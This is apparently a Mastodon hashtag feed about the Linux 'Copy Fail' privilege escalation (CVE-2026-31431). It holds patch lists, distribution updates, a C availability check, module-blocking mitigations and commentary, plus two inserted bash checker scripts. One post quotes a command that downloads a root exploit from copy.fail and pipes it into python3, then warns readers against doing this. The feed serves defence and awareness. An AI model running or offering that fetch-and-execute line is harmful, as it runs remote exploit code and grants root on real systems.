#copyfail

@grono@mastodon.com.pl · 53m ago
Docker Engine is safe against CVE-2026-31431 now. Patch ASAP: https://github.com/moby/moby/releases/tag/docker-v29.4.2 #docker #containers #linux #copyfail
@adhisimon@mastodon.kodesumber.com · 8h ago
Before trying to mitigate, it turns out my #fedora 43 workstation (not upgraded to 44 yet) had already updated and is not vulnerable to #copyfail
@adhisimon@mastodon.kodesumber.com · 8h ago
Fedora released Fedora CoreOS 43.20260413.3.2 on the "stable stream" a few hours ago to patch against Copy Fail. Upgraded packages:

  • kernel-6.19.11-200.fc43.x86_64 ⟶ 6.19.12-200.fc43.x86_64
  • kernel-core-6.19.11-200.fc43.x86_64 ⟶ 6.19.12-200.fc43.x86_64
  • kernel-modules-6.19.11-200.fc43.x86_64 ⟶ 6.19.12-200.fc43.x86_64
  • kernel-modules-core-6.19.11-200.fc43.x86_64 ⟶ 6.19.12-200.fc43.x86_64

You can wait for your zincati service schedule to upgrade automatically, or you can run sudo zincati-update-now to upgrade immediately. #copyfail #fedora #fcos #coreos
@veronica@mastodon.online · 12h ago
Copy Fail (CVE-2026-31431) has just been patched on Debian 13, with kernel version 6.12.85-1 from trixie (security). https://security-tracker.debian.org/tracker/CVE-2026-31431 #CopyFail #Debian #Linux #InfoSec #CVE
@tankgrrl@hachyderm.io · 15h ago
No warranty implied, use at your own risk. But this short C program can check if your Linux machine is still vulnerable to Copy Fail (there's also this page with python code from our friends in Estonia https://docs.hpc.ut.ee/public/cve-2026-31431/ )

Output includes "ARE available" or "NOT available"

Again: compile and run at your own risk. Don't just trust me blindly. Read the code.

#CopyFail #CVE-2026-31431

==============
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_alg.h>

int main(void) {
    int sock;
    struct sockaddr_alg sa;

    // Prepare sockaddr_alg for AEAD/GCM
    memset(&sa, 0, sizeof(sa));
    sa.salg_family = AF_ALG;
    strcpy((char *)sa.salg_type, "aead");
    strcpy((char *)sa.salg_name, "gcm(aes)");

    // Try to create AF_ALG socket
    sock = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (sock == -1) {
        perror("socket(AF_ALG, aead)");
        printf("algif_aead functions are NOT available (AF_ALG socket creation failed).\n");
        return 1;
    }

    // Try to bind to AEAD/GCM
    if (bind(sock, (struct sockaddr *)&sa, sizeof(sa)) == -1) {
        perror("bind(AF_ALG, aead, gcm(aes))");
        printf("algif_aead functions are NOT available (bind failed).\n");
        close(sock);
        return 1;
    }

    printf("algif_aead functions ARE available (AF_ALG AEAD bind succeeded).\n");
    close(sock);
    return 0;
}
@rysiek@mstdn.social · 13h ago
A lot of people are apparently happily running a script clearly marked as a root exploit from some random website using curl | bash :blobsweat: Some do inspect the script, but then still run it using curl | bash anyway. :thaenkin: Incidentally, this very relevant blogpost about detecting curl | bash and serving different scripts based on that is almost exactly a decade old: https://web.archive.org/web/20230318063325/https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/ #CopyFail #InfoSec
@matthew@social.retroedge.tech · 13h ago
Question on the #CopyFail Linux vulnerability: If "lsmod | grep algif_aead" returns nothing, is the vulnerability not exploitable? Most of my Linux machines are running older, non-patched kernels, but it doesn't seem like the affected kernel module is active... so does that mean a system that returns nothing for "lsmod | grep algif_aead" is not at risk for this exploit? #Linux
@harrysintonen@infosec.exchange · 1d ago

Mitigation to #CVE_2026_31431 / #copyfail :

  • If kernel config has CONFIG_CRYPTO_USER_API_AEAD=m:

echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf; sudo rmmod algif_aead

  • If kernel config has CONFIG_CRYPTO_USER_API_AEAD=y:

Add "initcall_blacklist=algif_aead_init" to the kernel command line and reboot.

https://www.openwall.com/lists/oss-security/2026/04/30/2
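
A check for whether either mitigation above is actually in place, as an added example that is not part of the original post. The function name and result labels are made up here, and it assumes the kernel config is readable at /boot/config-$(uname -r).

```bash
#!/usr/bin/env bash
# Added example (not from the post). File locations are parameters so the
# check can run against the live system or against copies of its files.

# aead_mitigation_state CONFIG MODPROBE_DIR CMDLINE MODULES
# prints: unknown | not-built | module-loaded | module-blocked |
#         module-loadable | builtin-blocked | builtin-active
aead_mitigation_state() {
    local config=$1 modprobe_dir=$2 cmdline=$3 modules=$4 setting
    [ -r "$config" ] || { echo "unknown"; return 0; }
    setting=$(sed -n 's/^CONFIG_CRYPTO_USER_API_AEAD=//p' "$config")
    case "$setting" in
    m)
        # =m case from the post. A module that is not loaded right now can
        # still be loaded on demand, so only the "install ... /bin/false"
        # override counts as blocked, and a loaded module still needs rmmod.
        if grep -qsE '^algif_aead ' "$modules"; then
            echo "module-loaded"
        elif grep -rqsE \
            '^[[:space:]]*install[[:space:]]+algif_aead[[:space:]]+/bin/false' \
            "$modprobe_dir"; then
            echo "module-blocked"
        else
            echo "module-loadable"
        fi ;;
    y)
        # =y case from the post: the initcall must be blacklisted at boot.
        if grep -qsE \
            '(^|[[:space:]])initcall_blacklist=([^[:space:]]*,)?algif_aead_init(,|[[:space:]]|$)' \
            "$cmdline"; then
            echo "builtin-blocked"
        else
            echo "builtin-active"
        fi ;;
    *)  echo "not-built" ;;
    esac
}

# Live system; /boot/config-$(uname -r) is an assumed location for the config.
aead_mitigation_state "/boot/config-$(uname -r)" /etc/modprobe.d \
    /proc/cmdline /proc/modules
```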

Boosted by Greg Bell @ferrix@mastodon.online
@alexanderkjall@mastodon.social · 18h ago
Today I have spent way too much time handling the https://copy.fail situation #copyfail The persons who discovered it didn't notify the distribution security list, so no patched kernels were available for people to install when they released it. But they did have time to write an exploit, and thought it was a good idea to distribute that on day one, before vendors had time to provide patches. I'm not very impressed with xint.io, I guess it's the marketing department that runs the show.
@nacho@frankenwolke.com · 21h ago
If you're Linux sysadmins, better not make plans for the long weekend... https://copy.fail/ #copyfail #cve_2026_31431
@data0@indieweb.social · 21h ago

I couldn’t find a list of #Linux #kernel versions that include a patch for #copyfail, so I dug into the commit log and made one. Make sure you’re using at least the following version of your branch to mitigate against copyfail:

  • 7.0-rc7 (any stable 7.x is safe)
  • 6.19.12
  • 6.18.22
  • 6.12.85
  • 6.6.137
  • 6.1.170
  • 5.15.204
  • 5.10.254

See https://copy.fail for more info about the #exploit.

#privilegeescalation #vulnerability #cryptography #linuxadmin #sysadmin
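
The list above turned into a check on a `uname -r` string, as an added example that is not part of the original post; the function name and result labels are made up here. It compares upstream version numbers only, so a `below-fix` result on a distribution kernel that backports fixes still has to be checked against the vendor's advisory.

```bash
#!/usr/bin/env bash
# Added example (not from the post). First fixed release per stable branch,
# copied from the list above; 7.0-rc7 is handled separately below.
FIXED_RELEASES="6.19.12 6.18.22 6.12.85 6.6.137 6.1.170 5.15.204 5.10.254"

# copyfail_kernel_status RELEASE
# prints: fixed | below-fix | branch-not-listed | unparsable
copyfail_kernel_status() {
    local release=$1 parts major minor patch rc fixed
    # Keep the leading upstream version: "6.19.11-zen1-1-zen" -> "6 19 11".
    parts=$(printf '%s\n' "$release" |
        sed -nE 's/^([0-9]+)\.([0-9]+)(\.([0-9]+))?.*$/\1 \2 \4/p')
    [ -n "$parts" ] || { echo "unparsable"; return 0; }
    set -- $parts
    major=$1 minor=$2 patch=${3:-0}

    if [ "$major" -ge 7 ]; then
        # Release candidates before 7.0-rc7 predate the fix.
        rc=$(printf '%s\n' "$release" |
            sed -nE 's/^7\.0(\.0)?-rc([0-9]+).*$/\2/p')
        if [ -n "$rc" ] && [ "$rc" -lt 7 ]; then
            echo "below-fix"
        else
            echo "fixed"
        fi
        return 0
    fi

    for fixed in $FIXED_RELEASES; do
        case "$fixed" in
        "$major.$minor".*)
            # Same branch: compare the patch level with the first fixed one.
            if [ "$patch" -ge "${fixed##*.}" ]; then
                echo "fixed"
            else
                echo "below-fix"
            fi
            return 0 ;;
        esac
    done
    # Branch is not in the list, so the list cannot answer the question.
    echo "branch-not-listed"
}

copyfail_kernel_status "$(uname -r)"
```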

@Viss@mastodon.social · 1d ago
#copyfail just to chime in on the copyfail thing, while, yes, it is a very big deal, the prerequisite is that you have a shell on the box you wish to exploit. so keep that in mind when doing risk register stuff. attackers will aim for shit like jumpboxes, shared hosting environments, multi-tenancy environments, and places they can get a shell, then move laterally to get you. shops doing yolo devops are gonna get targeted, and I wouldn't be surprised to see openclaw malicious skills too
In reply to
@Viss@mastodon.social · 1d ago
right now, every single remote code vuln that will lead to command injection or rce will make this #copyfail thing a very very big deal. so all those qa servers and staging servers and test boxes you think nobody gives a shit about that are just flapping out there in the public, not being logged, not in the siem, not getting alerted on, not getting patched? all those are gonna catch the "oops attackers overwrote sshd to steal creds" disease. or cryptominers. or proxies.
@whitequark@social.treehouse.systems · 22h ago
#copyfail is why the Forgejo Actions runner service i'm setting up will be using kvm and single shot VMs rather than containers
@thadah@blahaj.zone · 22h ago
CopyFail in action 6.19.11-zen1-1-zen running on Garuda Linux #copyfail
@niebezpiecznikbot@mastodon.com.pl · 23h ago
Got Linux? Then patch it fast! An attack affecting all Linux systems released after 2017 has been disclosed. Exploit code has also appeared online. Running it on a vulnerable machine gives the attacker root privileges. The silver lining: this vulnerability is a Local, not a Remote, Privilege Escalation. Even so, we recommend that everyone install the update quickly, not only admins of machines that many users work on or that host containers. How do you check whether you are vulnerable? To verify whether your system is vulnerable, it is enough to run this 732-byte Python script. For a quick check you can run the command below: just copy it and paste it into a terminal as a regular user. If after running it you see uid=0(root) and become root, you are vulnerable to the attack: curl https://copy.fail/exp | python3 && su Did you copy and paste it without checking what is behind the URL? Mistake. Never do that! "Piping" code from the internet into a shell is asking for trouble. And no, opening the URL in a browser and checking the code is not enough, because a malicious site can serve your browser something different from what it serves curl at the same address (so-called User-Agent cloaking). The correct approach is to read the displayed code looking for malicious instructions (if you cannot judge that yourself, ask your AI assistant for help), then copy the code to a local file and only then run it in the Python interpreter. As an aside, if you want to learn to test your environments for various vulnerabilities, holes and attacks, come to our bestselling penetration testing training, Bezpieczeństwa Sieci i Systemów Komputerowych. For 3 days we hack various machines there in various ways, showing techniques and tools that let you check your environment against various attacks and consequently significantly [...] #CopyFail #Linux https://niebezpiecznik.pl/post/copyfail-linux-exploit/
@astraleureka@social.treehouse.systems · 1d ago
I deobfuscated the #copyfail exploit and fixed up the payload to run under Alpine: https://astr.al/notes/2026-04-29_copyfail/
@selea@social.linux.pizza · 1d ago
The #copyfail exploit is not fun...
@darkrat@chaosfurs.social · 1d ago

Holy. Fucking. Fuckballs.

This exploit is… insane.

An unprivileged local user can write 4 controlled bytes into the page cache of any readable file on a Linux system, and use that to gain root

https://copy.fail/

#copyfail #linux
